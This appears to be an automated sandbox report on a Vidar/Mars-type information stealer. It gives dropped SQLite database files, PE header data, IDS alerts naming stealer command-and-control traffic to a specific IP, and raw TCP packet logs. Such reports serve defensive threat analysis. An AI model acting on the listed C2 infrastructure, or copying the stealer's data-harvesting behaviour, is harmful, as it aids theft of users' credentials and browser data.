                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):1.1358696453229276
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\BAIMOHVS

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):2.5793180405395284
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\BIM7Y5P8

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):40960
                                                                                        Entropy (8bit):0.8553638852307782
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\NGVKNGVA

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.8180424350137764
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\PH4EU37Q

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):126976
                                                                                        Entropy (8bit):0.47147045728725767
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\R1D2DTRQ

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):114688
                                                                                        Entropy (8bit):0.9746603542602881
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\ZMGDJECB

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):159744
                                                                                        Entropy (8bit):0.7873599747470391
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):5.3797731993296125
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:4bVsmYiuXy.exe
                                                                                        File size:2'755'584 bytes
                                                                                        MD5:bffa608e609a6e2f67d01bb5f64ba70a
                                                                                        SHA1:dfc31151b6886f6a0e18c6a564f766591772b78f
                                                                                        SHA256:27c43e0863d1f53297dc16f09626d956c6f86cf3285bbd8eb8488eccb564fa66
                                                                                        SHA512:4936cea91c0d0cfbba73d0a62fb31c3cf4f915611c031f358bb9f86fceeed8318d25b3b2e9785bed7a77d3c4093a48b8d58a01520190fa6fd30a2d27276863b7
                                                                                        SSDEEP:12288:ljT1qos+lTLzwN9RYIA17At7y7qP7d1JHywHS38hy:+UlyYIApAxyGd1JSgS3my
                                                                                        TLSH:DDD5D29A417AD5DCB962DDDC3F2863B066D26D3D84B78F93069CCC3A80153BFD694882
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|xwe.........."...0...*..........'*.. ...@*...@.. .......................`*...........@................................

                                                                                        File Icon

                                                                                        Icon Hash:90cececece8e8eb0

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x6a279e
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6577787C [Mon Dec 11 21:00:44 2023 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2a27480x53.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a40000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000x2a07a40x2a0800unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x2a40000xc0x200False0.044921875MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "*"0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Imports

                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain

                                                                                        Network Behavior

                                                                                        Snort IDS Alerts

                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                        91.92.250.149192.168.2.480497292036654 12/16/23-18:16:56.208992TCP2036654ET TROJAN Win32/Vidar Variant/Mars Stealer Resources Download804972991.92.250.149192.168.2.4
                                                                                        192.168.2.491.92.250.14949729802022818 12/16/23-18:16:55.658028TCP2022818ET TROJAN Generic gate .php GET with minimal headers4972980192.168.2.491.92.250.149
                                                                                        192.168.2.491.92.250.14949729802036667 12/16/23-18:16:55.963288TCP2036667ET TROJAN Win32/Vidar Variant/Mars CnC Activity (GET)4972980192.168.2.491.92.250.149
                                                                                        192.168.2.491.92.250.14949729802022986 12/16/23-18:16:55.658028TCP2022986ET TROJAN Generic Request to gate.php Dotted-Quad4972980192.168.2.491.92.250.149

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 16, 2023 18:16:55.412321091 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:55.657679081 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:55.657867908 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:55.658027887 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:55.903230906 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:55.961082935 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:55.961246014 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:55.963288069 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.208323956 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.208992004 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.209005117 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.209017992 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.209031105 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.209048986 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.209084034 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.209084034 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.209116936 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.209142923 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.209180117 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.209212065 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.209254026 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.209275007 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.209306002 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.209316015 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.209341049 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.209403992 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.209444046 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.454298019 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.454314947 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.454391003 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.454500914 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.454514027 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.454524994 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.454536915 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.454549074 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.454550982 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.454560995 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.454591036 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.454735994 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.454773903 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.454773903 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.454776049 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.454827070 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.454842091 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.454880953 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.454900980 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.454937935 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.454948902 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.454987049 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.455162048 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.455207109 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.455215931 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.455240011 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.455255985 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.455286980 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.455307961 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.455346107 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.455358982 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.455395937 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.455398083 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.455434084 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.455483913 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.455522060 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.700160027 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.700237989 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.700238943 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.700294018 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.700438976 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.700490952 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.700525045 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.700561047 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.700593948 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.700637102 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.700803041 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.700850010 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.700875998 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.700922966 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.701057911 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.701105118 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.701117992 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.701153994 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.701189041 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.701227903 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.701262951 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.701303959 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.701339960 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.701390982 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.701400995 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.701436043 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.701447964 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.701482058 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.701504946 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.701539040 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.701574087 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.701617002 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.701677084 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.701724052 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.701749086 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.701792955 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.701816082 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.701848984 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.701884985 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.701927900 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.702018976 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.702068090 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.702137947 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.702192068 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.702225924 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.702265024 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.702313900 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.702358007 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.702439070 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.702483892 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.702518940 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.702557087 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.702574015 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.702608109 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.702630997 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.702662945 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.702697992 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.702743053 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.702790022 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.702817917 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.702835083 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.702862978 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.702934027 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.702979088 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.702992916 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.703032970 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.703114986 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.703159094 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.703181028 CET804972991.92.250.149192.168.2.4
